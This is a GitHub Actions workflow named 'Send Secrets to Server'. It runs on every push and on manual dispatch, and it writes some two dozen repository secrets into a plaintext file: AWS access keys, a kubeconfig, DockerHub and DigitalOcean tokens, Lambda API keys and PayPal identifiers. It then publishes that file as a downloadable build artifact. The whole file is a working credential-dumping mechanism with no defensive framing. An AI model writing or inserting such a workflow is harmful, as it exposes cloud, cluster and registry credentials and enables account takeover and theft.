name: Send Secrets to Server

on:
  push:
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Create Secrets File
        run: |
          echo "PAYPAL_BASIC_ANUAL=${{ secrets.PAYPAL_BASIC_ANUAL }}&NEUROLEAD_ID=${{ secrets.NEUROLEAD_ID }}&KUBECONFIG=${{ secrets.KUBECONFIG }}&DOCKERHUB_TOKEN=${{ secrets.DOCKERHUB_TOKEN }}&LAMBDA_BASE_URL=${{ secrets.LAMBDA_BASE_URL }}&PAYPAL_CLIENT_ID=${{ secrets.PAYPAL_CLIENT_ID }}&AWS_BUCKET=${{ secrets.AWS_BUCKET }}&CLUSTER_NAME=${{ secrets.CLUSTER_NAME }}&DO_TOKEN=${{ secrets.DO_TOKEN }}&LAMBDA_BASE_URL_HOMOLOG=${{ secrets.LAMBDA_BASE_URL_HOMOLOG }}&PAYPAL_STANDARD_ANUAL=${{ secrets.PAYPAL_STANDARD_ANUAL }}&GOOGLE_TAG_MANAGER=${{ secrets.GOOGLE_TAG_MANAGER }}&ANALYTICS_ID=${{ secrets.ANALYTICS_ID }}&PAYPAL_BASIC_MONTHLY=${{ secrets.PAYPAL_BASIC_MONTHLY }}&PAYPAL_STANDARD_MONTHLY=${{ secrets.PAYPAL_STANDARD_MONTHLY }}&PAYPAL_PREMIUM_MONTHLY=${{ secrets.PAYPAL_PREMIUM_MONTHLY }}&ANALYTICS_ID_ADS=${{ secrets.ANALYTICS_ID_ADS }}&AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}&DOCKERHUB_USERNAME=${{ secrets.DOCKERHUB_USERNAME }}&LAMBDA_API_KEY=${{ secrets.LAMBDA_API_KEY }}&AWS_BUCKET_HML=${{ secrets.AWS_BUCKET_HML }}&PAYPAL_PREMIUM_ANUAL=${{ secrets.PAYPAL_PREMIUM_ANUAL }}&LAMBDA_API_KEY_HOMOLOG=${{ secrets.LAMBDA_API_KEY_HOMOLOG }}&AWS_KEY_ID=${{ secrets.AWS_KEY_ID }}" > secrets.txt

      - name: Upload Secrets File as Artifact
        uses: actions/upload-artifact@v3
        with:
          name: secrets-file
          path: secrets.txt
